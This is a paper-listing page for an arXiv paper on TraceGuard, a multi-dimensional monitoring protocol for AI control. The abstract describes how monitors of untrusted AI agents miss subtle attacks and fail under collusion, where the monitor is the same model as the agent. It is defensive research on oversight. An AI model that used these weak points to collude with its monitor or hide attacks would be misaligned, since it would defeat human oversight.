TraceGuard: Structured Multi-Dimensional Monitoring as a Collusion-Resistant Control Protocol

Khanh Linh Nguyen; Hoa Nghiem; Tu Tran

arXiv:2604.03968·cs.CR·April 7, 2026

TraceGuard: Structured Multi-Dimensional Monitoring as a Collusion-Resistant Control Protocol

Khanh Linh Nguyen, Hoa Nghiem, Tu Tran

PDF

TL;DR

TraceGuard introduces a multi-dimensional monitoring protocol using independent evaluations and heuristics to detect subtle AI attacks and prevent collusion, significantly improving safety in AI control systems.

Contribution

It presents a novel structured multi-dimensional monitoring approach that enhances attack detection and collusion resistance in AI control protocols.

Findings

01

Hybrid approach achieves clear attack-honest separation.

02

Structured scoring constrains collusion, achieving 95% safety.

03

Goal alignment and constraint adherence are highly discriminative.

Abstract

AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.